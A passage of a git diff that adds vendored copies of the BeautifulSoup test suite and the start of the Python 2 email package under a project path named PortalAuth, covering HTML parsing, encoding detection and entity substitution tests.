self.assertSoupEquals(
|
||||
"<table><thead><tr><td>Foo</td></tr></thead>"
|
||||
"<tbody><tr><td>Bar</td></tr></tbody>"
|
||||
"<tfoot><tr><td>Baz</td></tr></tfoot></table>")
|
||||
|
||||
def test_xml_declaration_followed_by_doctype(self):
|
||||
markup = '''<?xml version="1.0" encoding="utf-8"?>
|
||||
<!DOCTYPE html>
|
||||
<html>
|
||||
<head>
|
||||
</head>
|
||||
<body>
|
||||
<p>foo</p>
|
||||
</body>
|
||||
</html>'''
|
||||
soup = self.soup(markup)
|
||||
# Verify that we can reach the <p> tag; this means the tree is connected.
|
||||
self.assertEqual(b"<p>foo</p>", soup.p.encode())
|
||||
|
||||
def test_reparented_markup(self):
|
||||
markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p></body>", soup.body.decode())
|
||||
self.assertEqual(2, len(soup.find_all('p')))
|
||||
|
||||
|
||||
def test_reparented_markup_ends_with_whitespace(self):
|
||||
markup = '<p><em>foo</p>\n<p>bar<a></a></em></p>\n'
|
||||
soup = self.soup(markup)
|
||||
self.assertEqual(u"<body><p><em>foo</em></p><em>\n</em><p><em>bar<a></a></em></p>\n</body>", soup.body.decode())
|
||||
self.assertEqual(2, len(soup.find_all('p')))
|
||||
|
||||
def test_processing_instruction(self):
|
||||
"""Processing instructions become comments."""
|
||||
markup = b"""<?PITarget PIContent?>"""
|
||||
soup = self.soup(markup)
|
||||
assert str(soup).startswith("<!--?PITarget PIContent?-->")
|
||||
32
PortalAuth/includes/scripts/libs/bs4/tests/test_htmlparser.py
Executable file
32
PortalAuth/includes/scripts/libs/bs4/tests/test_htmlparser.py
Executable file
@@ -0,0 +1,32 @@
|
||||
"""Tests to ensure that the html.parser tree builder generates good
|
||||
trees."""
|
||||
|
||||
from pdb import set_trace
|
||||
import pickle
|
||||
from bs4.testing import SoupTest, HTMLTreeBuilderSmokeTest
|
||||
from bs4.builder import HTMLParserTreeBuilder
|
||||
|
||||
class HTMLParserTreeBuilderSmokeTest(SoupTest, HTMLTreeBuilderSmokeTest):
|
||||
|
||||
@property
|
||||
def default_builder(self):
|
||||
return HTMLParserTreeBuilder()
|
||||
|
||||
def test_namespaced_system_doctype(self):
|
||||
# html.parser can't handle namespaced doctypes, so skip this one.
|
||||
pass
|
||||
|
||||
def test_namespaced_public_doctype(self):
|
||||
# html.parser can't handle namespaced doctypes, so skip this one.
|
||||
pass
|
||||
|
||||
def test_builder_is_pickled(self):
|
||||
"""Unlike most tree builders, HTMLParserTreeBuilder and will
|
||||
be restored after pickling.
|
||||
"""
|
||||
tree = self.soup("<a><b>foo</a>")
|
||||
dumped = pickle.dumps(tree, 2)
|
||||
loaded = pickle.loads(dumped)
|
||||
self.assertTrue(isinstance(loaded.builder, type(tree.builder)))
|
||||
|
||||
|
||||
76
PortalAuth/includes/scripts/libs/bs4/tests/test_lxml.py
Executable file
76
PortalAuth/includes/scripts/libs/bs4/tests/test_lxml.py
Executable file
@@ -0,0 +1,76 @@
|
||||
"""Tests to ensure that the lxml tree builder generates good trees."""
|
||||
|
||||
import re
|
||||
import warnings
|
||||
|
||||
try:
|
||||
import lxml.etree
|
||||
LXML_PRESENT = True
|
||||
LXML_VERSION = lxml.etree.LXML_VERSION
|
||||
except ImportError, e:
|
||||
LXML_PRESENT = False
|
||||
LXML_VERSION = (0,)
|
||||
|
||||
if LXML_PRESENT:
|
||||
from bs4.builder import LXMLTreeBuilder, LXMLTreeBuilderForXML
|
||||
|
||||
from bs4 import (
|
||||
BeautifulSoup,
|
||||
BeautifulStoneSoup,
|
||||
)
|
||||
from bs4.element import Comment, Doctype, SoupStrainer
|
||||
from bs4.testing import skipIf
|
||||
from bs4.tests import test_htmlparser
|
||||
from bs4.testing import (
|
||||
HTMLTreeBuilderSmokeTest,
|
||||
XMLTreeBuilderSmokeTest,
|
||||
SoupTest,
|
||||
skipIf,
|
||||
)
|
||||
|
||||
@skipIf(
|
||||
not LXML_PRESENT,
|
||||
"lxml seems not to be present, not testing its tree builder.")
|
||||
class LXMLTreeBuilderSmokeTest(SoupTest, HTMLTreeBuilderSmokeTest):
|
||||
"""See ``HTMLTreeBuilderSmokeTest``."""
|
||||
|
||||
@property
|
||||
def default_builder(self):
|
||||
return LXMLTreeBuilder()
|
||||
|
||||
def test_out_of_range_entity(self):
|
||||
self.assertSoupEquals(
|
||||
"<p>foo�bar</p>", "<p>foobar</p>")
|
||||
self.assertSoupEquals(
|
||||
"<p>foo�bar</p>", "<p>foobar</p>")
|
||||
self.assertSoupEquals(
|
||||
"<p>foo�bar</p>", "<p>foobar</p>")
|
||||
|
||||
# In lxml < 2.3.5, an empty doctype causes a segfault. Skip this
|
||||
# test if an old version of lxml is installed.
|
||||
|
||||
@skipIf(
|
||||
not LXML_PRESENT or LXML_VERSION < (2,3,5,0),
|
||||
"Skipping doctype test for old version of lxml to avoid segfault.")
|
||||
def test_empty_doctype(self):
|
||||
soup = self.soup("<!DOCTYPE>")
|
||||
doctype = soup.contents[0]
|
||||
self.assertEqual("", doctype.strip())
|
||||
|
||||
def test_beautifulstonesoup_is_xml_parser(self):
|
||||
# Make sure that the deprecated BSS class uses an xml builder
|
||||
# if one is installed.
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = BeautifulStoneSoup("<b />")
|
||||
self.assertEqual(u"<b/>", unicode(soup.b))
|
||||
self.assertTrue("BeautifulStoneSoup class is deprecated" in str(w[0].message))
|
||||
|
||||
@skipIf(
|
||||
not LXML_PRESENT,
|
||||
"lxml seems not to be present, not testing its XML tree builder.")
|
||||
class LXMLXMLTreeBuilderSmokeTest(SoupTest, XMLTreeBuilderSmokeTest):
|
||||
"""See ``HTMLTreeBuilderSmokeTest``."""
|
||||
|
||||
@property
|
||||
def default_builder(self):
|
||||
return LXMLTreeBuilderForXML()
|
||||
482
PortalAuth/includes/scripts/libs/bs4/tests/test_soup.py
Executable file
482
PortalAuth/includes/scripts/libs/bs4/tests/test_soup.py
Executable file
@@ -0,0 +1,482 @@
|
||||
# -*- coding: utf-8 -*-
|
||||
"""Tests of Beautiful Soup as a whole."""
|
||||
|
||||
from pdb import set_trace
|
||||
import logging
|
||||
import unittest
|
||||
import sys
|
||||
import tempfile
|
||||
|
||||
from bs4 import (
|
||||
BeautifulSoup,
|
||||
BeautifulStoneSoup,
|
||||
)
|
||||
from bs4.element import (
|
||||
CharsetMetaAttributeValue,
|
||||
ContentMetaAttributeValue,
|
||||
SoupStrainer,
|
||||
NamespacedAttribute,
|
||||
)
|
||||
import bs4.dammit
|
||||
from bs4.dammit import (
|
||||
EntitySubstitution,
|
||||
UnicodeDammit,
|
||||
EncodingDetector,
|
||||
)
|
||||
from bs4.testing import (
|
||||
SoupTest,
|
||||
skipIf,
|
||||
)
|
||||
import warnings
|
||||
|
||||
try:
|
||||
from bs4.builder import LXMLTreeBuilder, LXMLTreeBuilderForXML
|
||||
LXML_PRESENT = True
|
||||
except ImportError, e:
|
||||
LXML_PRESENT = False
|
||||
|
||||
PYTHON_2_PRE_2_7 = (sys.version_info < (2,7))
|
||||
PYTHON_3_PRE_3_2 = (sys.version_info[0] == 3 and sys.version_info < (3,2))
|
||||
|
||||
class TestConstructor(SoupTest):
|
||||
|
||||
def test_short_unicode_input(self):
|
||||
data = u"<h1>éé</h1>"
|
||||
soup = self.soup(data)
|
||||
self.assertEqual(u"éé", soup.h1.string)
|
||||
|
||||
def test_embedded_null(self):
|
||||
data = u"<h1>foo\0bar</h1>"
|
||||
soup = self.soup(data)
|
||||
self.assertEqual(u"foo\0bar", soup.h1.string)
|
||||
|
||||
def test_exclude_encodings(self):
|
||||
utf8_data = u"Räksmörgås".encode("utf-8")
|
||||
soup = self.soup(utf8_data, exclude_encodings=["utf-8"])
|
||||
self.assertEqual("windows-1252", soup.original_encoding)
|
||||
|
||||
|
||||
class TestWarnings(SoupTest):
|
||||
|
||||
def _no_parser_specified(self, s, is_there=True):
|
||||
v = s.startswith(BeautifulSoup.NO_PARSER_SPECIFIED_WARNING[:80])
|
||||
self.assertTrue(v)
|
||||
|
||||
def test_warning_if_no_parser_specified(self):
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup("<a><b></b></a>")
|
||||
msg = str(w[0].message)
|
||||
self._assert_no_parser_specified(msg)
|
||||
|
||||
def test_warning_if_parser_specified_too_vague(self):
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup("<a><b></b></a>", "html")
|
||||
msg = str(w[0].message)
|
||||
self._assert_no_parser_specified(msg)
|
||||
|
||||
def test_no_warning_if_explicit_parser_specified(self):
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup("<a><b></b></a>", "html.parser")
|
||||
self.assertEquals([], w)
|
||||
|
||||
def test_parseOnlyThese_renamed_to_parse_only(self):
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup("<a><b></b></a>", parseOnlyThese=SoupStrainer("b"))
|
||||
msg = str(w[0].message)
|
||||
self.assertTrue("parseOnlyThese" in msg)
|
||||
self.assertTrue("parse_only" in msg)
|
||||
self.assertEqual(b"<b></b>", soup.encode())
|
||||
|
||||
def test_fromEncoding_renamed_to_from_encoding(self):
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
utf8 = b"\xc3\xa9"
|
||||
soup = self.soup(utf8, fromEncoding="utf8")
|
||||
msg = str(w[0].message)
|
||||
self.assertTrue("fromEncoding" in msg)
|
||||
self.assertTrue("from_encoding" in msg)
|
||||
self.assertEqual("utf8", soup.original_encoding)
|
||||
|
||||
def test_unrecognized_keyword_argument(self):
|
||||
self.assertRaises(
|
||||
TypeError, self.soup, "<a>", no_such_argument=True)
|
||||
|
||||
class TestWarnings(SoupTest):
|
||||
|
||||
def test_disk_file_warning(self):
|
||||
filehandle = tempfile.NamedTemporaryFile()
|
||||
filename = filehandle.name
|
||||
try:
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup(filename)
|
||||
msg = str(w[0].message)
|
||||
self.assertTrue("looks like a filename" in msg)
|
||||
finally:
|
||||
filehandle.close()
|
||||
|
||||
# The file no longer exists, so Beautiful Soup will no longer issue the warning.
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup(filename)
|
||||
self.assertEqual(0, len(w))
|
||||
|
||||
def test_url_warning(self):
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup("http://www.crummy.com/")
|
||||
msg = str(w[0].message)
|
||||
self.assertTrue("looks like a URL" in msg)
|
||||
|
||||
with warnings.catch_warnings(record=True) as w:
|
||||
soup = self.soup("http://www.crummy.com/ is great")
|
||||
self.assertEqual(0, len(w))
|
||||
|
||||
class TestSelectiveParsing(SoupTest):
|
||||
|
||||
def test_parse_with_soupstrainer(self):
|
||||
markup = "No<b>Yes</b><a>No<b>Yes <c>Yes</c></b>"
|
||||
strainer = SoupStrainer("b")
|
||||
soup = self.soup(markup, parse_only=strainer)
|
||||
self.assertEqual(soup.encode(), b"<b>Yes</b><b>Yes <c>Yes</c></b>")
|
||||
|
||||
|
||||
class TestEntitySubstitution(unittest.TestCase):
|
||||
"""Standalone tests of the EntitySubstitution class."""
|
||||
def setUp(self):
|
||||
self.sub = EntitySubstitution
|
||||
|
||||
def test_simple_html_substitution(self):
|
||||
# Unicode characters corresponding to named HTML entites
|
||||
# are substituted, and no others.
|
||||
s = u"foo\u2200\N{SNOWMAN}\u00f5bar"
|
||||
self.assertEqual(self.sub.substitute_html(s),
|
||||
u"foo∀\N{SNOWMAN}õbar")
|
||||
|
||||
def test_smart_quote_substitution(self):
|
||||
# MS smart quotes are a common source of frustration, so we
|
||||
# give them a special test.
|
||||
quotes = b"\x91\x92foo\x93\x94"
|
||||
dammit = UnicodeDammit(quotes)
|
||||
self.assertEqual(self.sub.substitute_html(dammit.markup),
|
||||
"‘’foo“”")
|
||||
|
||||
def test_xml_converstion_includes_no_quotes_if_make_quoted_attribute_is_false(self):
|
||||
s = 'Welcome to "my bar"'
|
||||
self.assertEqual(self.sub.substitute_xml(s, False), s)
|
||||
|
||||
def test_xml_attribute_quoting_normally_uses_double_quotes(self):
|
||||
self.assertEqual(self.sub.substitute_xml("Welcome", True),
|
||||
'"Welcome"')
|
||||
self.assertEqual(self.sub.substitute_xml("Bob's Bar", True),
|
||||
'"Bob\'s Bar"')
|
||||
|
||||
def test_xml_attribute_quoting_uses_single_quotes_when_value_contains_double_quotes(self):
|
||||
s = 'Welcome to "my bar"'
|
||||
self.assertEqual(self.sub.substitute_xml(s, True),
|
||||
"'Welcome to \"my bar\"'")
|
||||
|
||||
def test_xml_attribute_quoting_escapes_single_quotes_when_value_contains_both_single_and_double_quotes(self):
|
||||
s = 'Welcome to "Bob\'s Bar"'
|
||||
self.assertEqual(
|
||||
self.sub.substitute_xml(s, True),
|
||||
'"Welcome to "Bob\'s Bar""')
|
||||
|
||||
def test_xml_quotes_arent_escaped_when_value_is_not_being_quoted(self):
|
||||
quoted = 'Welcome to "Bob\'s Bar"'
|
||||
self.assertEqual(self.sub.substitute_xml(quoted), quoted)
|
||||
|
||||
def test_xml_quoting_handles_angle_brackets(self):
|
||||
self.assertEqual(
|
||||
self.sub.substitute_xml("foo<bar>"),
|
||||
"foo<bar>")
|
||||
|
||||
def test_xml_quoting_handles_ampersands(self):
|
||||
self.assertEqual(self.sub.substitute_xml("AT&T"), "AT&T")
|
||||
|
||||
def test_xml_quoting_including_ampersands_when_they_are_part_of_an_entity(self):
|
||||
self.assertEqual(
|
||||
self.sub.substitute_xml("ÁT&T"),
|
||||
"&Aacute;T&T")
|
||||
|
||||
def test_xml_quoting_ignoring_ampersands_when_they_are_part_of_an_entity(self):
|
||||
self.assertEqual(
|
||||
self.sub.substitute_xml_containing_entities("ÁT&T"),
|
||||
"ÁT&T")
|
||||
|
||||
def test_quotes_not_html_substituted(self):
|
||||
"""There's no need to do this except inside attribute values."""
|
||||
text = 'Bob\'s "bar"'
|
||||
self.assertEqual(self.sub.substitute_html(text), text)
|
||||
|
||||
|
||||
class TestEncodingConversion(SoupTest):
|
||||
# Test Beautiful Soup's ability to decode and encode from various
|
||||
# encodings.
|
||||
|
||||
def setUp(self):
|
||||
super(TestEncodingConversion, self).setUp()
|
||||
self.unicode_data = u'<html><head><meta charset="utf-8"/></head><body><foo>Sacr\N{LATIN SMALL LETTER E WITH ACUTE} bleu!</foo></body></html>'
|
||||
self.utf8_data = self.unicode_data.encode("utf-8")
|
||||
# Just so you know what it looks like.
|
||||
self.assertEqual(
|
||||
self.utf8_data,
|
||||
b'<html><head><meta charset="utf-8"/></head><body><foo>Sacr\xc3\xa9 bleu!</foo></body></html>')
|
||||
|
||||
def test_ascii_in_unicode_out(self):
|
||||
# ASCII input is converted to Unicode. The original_encoding
|
||||
# attribute is set to 'utf-8', a superset of ASCII.
|
||||
chardet = bs4.dammit.chardet_dammit
|
||||
logging.disable(logging.WARNING)
|
||||
try:
|
||||
def noop(str):
|
||||
return None
|
||||
# Disable chardet, which will realize that the ASCII is ASCII.
|
||||
bs4.dammit.chardet_dammit = noop
|
||||
ascii = b"<foo>a</foo>"
|
||||
soup_from_ascii = self.soup(ascii)
|
||||
unicode_output = soup_from_ascii.decode()
|
||||
self.assertTrue(isinstance(unicode_output, unicode))
|
||||
self.assertEqual(unicode_output, self.document_for(ascii.decode()))
|
||||
self.assertEqual(soup_from_ascii.original_encoding.lower(), "utf-8")
|
||||
finally:
|
||||
logging.disable(logging.NOTSET)
|
||||
bs4.dammit.chardet_dammit = chardet
|
||||
|
||||
def test_unicode_in_unicode_out(self):
|
||||
# Unicode input is left alone. The original_encoding attribute
|
||||
# is not set.
|
||||
soup_from_unicode = self.soup(self.unicode_data)
|
||||
self.assertEqual(soup_from_unicode.decode(), self.unicode_data)
|
||||
self.assertEqual(soup_from_unicode.foo.string, u'Sacr\xe9 bleu!')
|
||||
self.assertEqual(soup_from_unicode.original_encoding, None)
|
||||
|
||||
def test_utf8_in_unicode_out(self):
|
||||
# UTF-8 input is converted to Unicode. The original_encoding
|
||||
# attribute is set.
|
||||
soup_from_utf8 = self.soup(self.utf8_data)
|
||||
self.assertEqual(soup_from_utf8.decode(), self.unicode_data)
|
||||
self.assertEqual(soup_from_utf8.foo.string, u'Sacr\xe9 bleu!')
|
||||
|
||||
def test_utf8_out(self):
|
||||
# The internal data structures can be encoded as UTF-8.
|
||||
soup_from_unicode = self.soup(self.unicode_data)
|
||||
self.assertEqual(soup_from_unicode.encode('utf-8'), self.utf8_data)
|
||||
|
||||
@skipIf(
|
||||
PYTHON_2_PRE_2_7 or PYTHON_3_PRE_3_2,
|
||||
"Bad HTMLParser detected; skipping test of non-ASCII characters in attribute name.")
|
||||
def test_attribute_name_containing_unicode_characters(self):
|
||||
markup = u'<div><a \N{SNOWMAN}="snowman"></a></div>'
|
||||
self.assertEqual(self.soup(markup).div.encode("utf8"), markup.encode("utf8"))
|
||||
|
||||
class TestUnicodeDammit(unittest.TestCase):
|
||||
"""Standalone tests of UnicodeDammit."""
|
||||
|
||||
def test_unicode_input(self):
|
||||
markup = u"I'm already Unicode! \N{SNOWMAN}"
|
||||
dammit = UnicodeDammit(markup)
|
||||
self.assertEqual(dammit.unicode_markup, markup)
|
||||
|
||||
def test_smart_quotes_to_unicode(self):
|
||||
markup = b"<foo>\x91\x92\x93\x94</foo>"
|
||||
dammit = UnicodeDammit(markup)
|
||||
self.assertEqual(
|
||||
dammit.unicode_markup, u"<foo>\u2018\u2019\u201c\u201d</foo>")
|
||||
|
||||
def test_smart_quotes_to_xml_entities(self):
|
||||
markup = b"<foo>\x91\x92\x93\x94</foo>"
|
||||
dammit = UnicodeDammit(markup, smart_quotes_to="xml")
|
||||
self.assertEqual(
|
||||
dammit.unicode_markup, "<foo>‘’“”</foo>")
|
||||
|
||||
def test_smart_quotes_to_html_entities(self):
|
||||
markup = b"<foo>\x91\x92\x93\x94</foo>"
|
||||
dammit = UnicodeDammit(markup, smart_quotes_to="html")
|
||||
self.assertEqual(
|
||||
dammit.unicode_markup, "<foo>‘’“”</foo>")
|
||||
|
||||
def test_smart_quotes_to_ascii(self):
|
||||
markup = b"<foo>\x91\x92\x93\x94</foo>"
|
||||
dammit = UnicodeDammit(markup, smart_quotes_to="ascii")
|
||||
self.assertEqual(
|
||||
dammit.unicode_markup, """<foo>''""</foo>""")
|
||||
|
||||
def test_detect_utf8(self):
|
||||
utf8 = b"\xc3\xa9"
|
||||
dammit = UnicodeDammit(utf8)
|
||||
self.assertEqual(dammit.unicode_markup, u'\xe9')
|
||||
self.assertEqual(dammit.original_encoding.lower(), 'utf-8')
|
||||
|
||||
def test_convert_hebrew(self):
|
||||
hebrew = b"\xed\xe5\xec\xf9"
|
||||
dammit = UnicodeDammit(hebrew, ["iso-8859-8"])
|
||||
self.assertEqual(dammit.original_encoding.lower(), 'iso-8859-8')
|
||||
self.assertEqual(dammit.unicode_markup, u'\u05dd\u05d5\u05dc\u05e9')
|
||||
|
||||
def test_dont_see_smart_quotes_where_there_are_none(self):
|
||||
utf_8 = b"\343\202\261\343\203\274\343\202\277\343\202\244 Watch"
|
||||
dammit = UnicodeDammit(utf_8)
|
||||
self.assertEqual(dammit.original_encoding.lower(), 'utf-8')
|
||||
self.assertEqual(dammit.unicode_markup.encode("utf-8"), utf_8)
|
||||
|
||||
def test_ignore_inappropriate_codecs(self):
|
||||
utf8_data = u"Räksmörgås".encode("utf-8")
|
||||
dammit = UnicodeDammit(utf8_data, ["iso-8859-8"])
|
||||
self.assertEqual(dammit.original_encoding.lower(), 'utf-8')
|
||||
|
||||
def test_ignore_invalid_codecs(self):
|
||||
utf8_data = u"Räksmörgås".encode("utf-8")
|
||||
for bad_encoding in ['.utf8', '...', 'utF---16.!']:
|
||||
dammit = UnicodeDammit(utf8_data, [bad_encoding])
|
||||
self.assertEqual(dammit.original_encoding.lower(), 'utf-8')
|
||||
|
||||
def test_exclude_encodings(self):
|
||||
# This is UTF-8.
|
||||
utf8_data = u"Räksmörgås".encode("utf-8")
|
||||
|
||||
# But if we exclude UTF-8 from consideration, the guess is
|
||||
# Windows-1252.
|
||||
dammit = UnicodeDammit(utf8_data, exclude_encodings=["utf-8"])
|
||||
self.assertEqual(dammit.original_encoding.lower(), 'windows-1252')
|
||||
|
||||
# And if we exclude that, there is no valid guess at all.
|
||||
dammit = UnicodeDammit(
|
||||
utf8_data, exclude_encodings=["utf-8", "windows-1252"])
|
||||
self.assertEqual(dammit.original_encoding, None)
|
||||
|
||||
def test_encoding_detector_replaces_junk_in_encoding_name_with_replacement_character(self):
|
||||
detected = EncodingDetector(
|
||||
b'<?xml version="1.0" encoding="UTF-\xdb" ?>')
|
||||
encodings = list(detected.encodings)
|
||||
assert u'utf-\N{REPLACEMENT CHARACTER}' in encodings
|
||||
|
||||
def test_detect_html5_style_meta_tag(self):
|
||||
|
||||
for data in (
|
||||
b'<html><meta charset="euc-jp" /></html>',
|
||||
b"<html><meta charset='euc-jp' /></html>",
|
||||
b"<html><meta charset=euc-jp /></html>",
|
||||
b"<html><meta charset=euc-jp/></html>"):
|
||||
dammit = UnicodeDammit(data, is_html=True)
|
||||
self.assertEqual(
|
||||
"euc-jp", dammit.original_encoding)
|
||||
|
||||
def test_last_ditch_entity_replacement(self):
|
||||
# This is a UTF-8 document that contains bytestrings
|
||||
# completely incompatible with UTF-8 (ie. encoded with some other
|
||||
# encoding).
|
||||
#
|
||||
# Since there is no consistent encoding for the document,
|
||||
# Unicode, Dammit will eventually encode the document as UTF-8
|
||||
# and encode the incompatible characters as REPLACEMENT
|
||||
# CHARACTER.
|
||||
#
|
||||
# If chardet is installed, it will detect that the document
|
||||
# can be converted into ISO-8859-1 without errors. This happens
|
||||
# to be the wrong encoding, but it is a consistent encoding, so the
|
||||
# code we're testing here won't run.
|
||||
#
|
||||
# So we temporarily disable chardet if it's present.
|
||||
doc = b"""\357\273\277<?xml version="1.0" encoding="UTF-8"?>
|
||||
<html><b>\330\250\330\252\330\261</b>
|
||||
<i>\310\322\321\220\312\321\355\344</i></html>"""
|
||||
chardet = bs4.dammit.chardet_dammit
|
||||
logging.disable(logging.WARNING)
|
||||
try:
|
||||
def noop(str):
|
||||
return None
|
||||
bs4.dammit.chardet_dammit = noop
|
||||
dammit = UnicodeDammit(doc)
|
||||
self.assertEqual(True, dammit.contains_replacement_characters)
|
||||
self.assertTrue(u"\ufffd" in dammit.unicode_markup)
|
||||
|
||||
soup = BeautifulSoup(doc, "html.parser")
|
||||
self.assertTrue(soup.contains_replacement_characters)
|
||||
finally:
|
||||
logging.disable(logging.NOTSET)
|
||||
bs4.dammit.chardet_dammit = chardet
|
||||
|
||||
def test_byte_order_mark_removed(self):
|
||||
# A document written in UTF-16LE will have its byte order marker stripped.
|
||||
data = b'\xff\xfe<\x00a\x00>\x00\xe1\x00\xe9\x00<\x00/\x00a\x00>\x00'
|
||||
dammit = UnicodeDammit(data)
|
||||
self.assertEqual(u"<a>áé</a>", dammit.unicode_markup)
|
||||
self.assertEqual("utf-16le", dammit.original_encoding)
|
||||
|
||||
def test_detwingle(self):
|
||||
# Here's a UTF8 document.
|
||||
utf8 = (u"\N{SNOWMAN}" * 3).encode("utf8")
|
||||
|
||||
# Here's a Windows-1252 document.
|
||||
windows_1252 = (
|
||||
u"\N{LEFT DOUBLE QUOTATION MARK}Hi, I like Windows!"
|
||||
u"\N{RIGHT DOUBLE QUOTATION MARK}").encode("windows_1252")
|
||||
|
||||
# Through some unholy alchemy, they've been stuck together.
|
||||
doc = utf8 + windows_1252 + utf8
|
||||
|
||||
# The document can't be turned into UTF-8:
|
||||
self.assertRaises(UnicodeDecodeError, doc.decode, "utf8")
|
||||
|
||||
# Unicode, Dammit thinks the whole document is Windows-1252,
|
||||
# and decodes it into "☃☃☃“Hi, I like Windows!”☃☃☃"
|
||||
|
||||
# But if we run it through fix_embedded_windows_1252, it's fixed:
|
||||
|
||||
fixed = UnicodeDammit.detwingle(doc)
|
||||
self.assertEqual(
|
||||
u"☃☃☃“Hi, I like Windows!”☃☃☃", fixed.decode("utf8"))
|
||||
|
||||
def test_detwingle_ignores_multibyte_characters(self):
|
||||
# Each of these characters has a UTF-8 representation ending
|
||||
# in \x93. \x93 is a smart quote if interpreted as
|
||||
# Windows-1252. But our code knows to skip over multibyte
|
||||
# UTF-8 characters, so they'll survive the process unscathed.
|
||||
for tricky_unicode_char in (
|
||||
u"\N{LATIN SMALL LIGATURE OE}", # 2-byte char '\xc5\x93'
|
||||
u"\N{LATIN SUBSCRIPT SMALL LETTER X}", # 3-byte char '\xe2\x82\x93'
|
||||
u"\xf0\x90\x90\x93", # This is a CJK character, not sure which one.
|
||||
):
|
||||
input = tricky_unicode_char.encode("utf8")
|
||||
self.assertTrue(input.endswith(b'\x93'))
|
||||
output = UnicodeDammit.detwingle(input)
|
||||
self.assertEqual(output, input)
|
||||
|
||||
class TestNamedspacedAttribute(SoupTest):
|
||||
|
||||
def test_name_may_be_none(self):
|
||||
a = NamespacedAttribute("xmlns", None)
|
||||
self.assertEqual(a, "xmlns")
|
||||
|
||||
def test_attribute_is_equivalent_to_colon_separated_string(self):
|
||||
a = NamespacedAttribute("a", "b")
|
||||
self.assertEqual("a:b", a)
|
||||
|
||||
def test_attributes_are_equivalent_if_prefix_and_name_identical(self):
|
||||
a = NamespacedAttribute("a", "b", "c")
|
||||
b = NamespacedAttribute("a", "b", "c")
|
||||
self.assertEqual(a, b)
|
||||
|
||||
# The actual namespace is not considered.
|
||||
c = NamespacedAttribute("a", "b", None)
|
||||
self.assertEqual(a, c)
|
||||
|
||||
# But name and prefix are important.
|
||||
d = NamespacedAttribute("a", "z", "c")
|
||||
self.assertNotEqual(a, d)
|
||||
|
||||
e = NamespacedAttribute("z", "b", "c")
|
||||
self.assertNotEqual(a, e)
|
||||
|
||||
|
||||
class TestAttributeValueWithCharsetSubstitution(unittest.TestCase):
|
||||
|
||||
def test_content_meta_attribute_value(self):
|
||||
value = CharsetMetaAttributeValue("euc-jp")
|
||||
self.assertEqual("euc-jp", value)
|
||||
self.assertEqual("euc-jp", value.original_value)
|
||||
self.assertEqual("utf8", value.encode("utf8"))
|
||||
|
||||
|
||||
def test_content_meta_attribute_value(self):
|
||||
value = ContentMetaAttributeValue("text/html; charset=euc-jp")
|
||||
self.assertEqual("text/html; charset=euc-jp", value)
|
||||
self.assertEqual("text/html; charset=euc-jp", value.original_value)
|
||||
self.assertEqual("text/html; charset=utf8", value.encode("utf8"))
|
||||
1979
PortalAuth/includes/scripts/libs/bs4/tests/test_tree.py
Executable file
1979
PortalAuth/includes/scripts/libs/bs4/tests/test_tree.py
Executable file
File diff suppressed because it is too large
Load Diff
123
PortalAuth/includes/scripts/libs/email/__init__.py
Executable file
123
PortalAuth/includes/scripts/libs/email/__init__.py
Executable file
@@ -0,0 +1,123 @@
|
||||
# Copyright (C) 2001-2006 Python Software Foundation
|
||||
# Author: Barry Warsaw
|
||||
# Contact: email-sig@python.org
|
||||
|
||||
"""A package for parsing, handling, and generating email messages."""
|
||||
|
||||
__version__ = '4.0.3'
|
||||
|
||||
__all__ = [
|
||||
# Old names
|
||||
'base64MIME',
|
||||
'Charset',
|
||||
'Encoders',
|
||||
'Errors',
|
||||
'Generator',
|
||||
'Header',
|
||||
'Iterators',
|
||||
'Message',
|
||||
'MIMEAudio',
|
||||
'MIMEBase',
|
||||
'MIMEImage',
|
||||
'MIMEMessage',
|
||||
'MIMEMultipart',
|
||||
'MIMENonMultipart',
|
||||
'MIMEText',
|
||||
'Parser',
|
||||
'quopriMIME',
|
||||
'Utils',
|
||||
'message_from_string',
|
||||
'message_from_file',
|
||||
# new names
|
||||
'base64mime',
|
||||
'charset',
|
||||
'encoders',
|
||||
'errors',
|
||||
'generator',
|
||||
'header',
|
||||
'iterators',
|
||||
'message',
|
||||
'mime',
|
||||
'parser',
|
||||
'quoprimime',
|
||||
'utils',
|
||||
]
|
||||
|
||||
|
||||
|
||||
# Some convenience routines. Don't import Parser and Message as side-effects
|
||||
# of importing email since those cascadingly import most of the rest of the
|
||||
# email package.
|
||||
def message_from_string(s, *args, **kws):
|
||||
"""Parse a string into a Message object model.
|
||||
|
||||
Optional _class and strict are passed to the Parser constructor.
|
||||
"""
|
||||
from email.parser import Parser
|
||||
return Parser(*args, **kws).parsestr(s)
|
||||
|
||||
|
||||
def message_from_file(fp, *args, **kws):
|
||||
"""Read a file and parse its contents into a Message object model.
|
||||
|
||||
Optional _class and strict are passed to the Parser constructor.
|
||||
"""
|
||||
from email.parser import Parser
|
||||
return Parser(*args, **kws).parse(fp)
|
||||
|
||||
|
||||
|
||||
# Lazy loading to provide name mapping from new-style names (PEP 8 compatible
|
||||
# email 4.0 module names), to old-style names (email 3.0 module names).
|
||||
import sys
|
||||
|
||||
class LazyImporter(object):
|
||||
def __init__(self, module_name):
|
||||
self.__name__ = 'email.' + module_name
|
||||
|
||||
def __getattr__(self, name):
|
||||
__import__(self.__name__)
|
||||
mod = sys.modules[self.__name__]
|
||||
self.__dict__.update(mod.__dict__)
|
||||
return getattr(mod, name)
|
||||
|
||||
|
||||
_LOWERNAMES = [
|
||||
# email.<old name> -> email.<new name is lowercased old name>
|
||||
'Charset',
|
||||
'Encoders',
|
||||
'Errors',
|
||||
'FeedParser',
|
||||
'Generator',
|
||||
'Header',
|
||||
'Iterators',
|
||||
'Message',
|
||||
'Parser',
|
||||
'Utils',
|
||||
'base64MIME',
|
||||
'quopriMIME',
|
||||
]
|
||||
|
||||
_MIMENAMES = [
|
||||
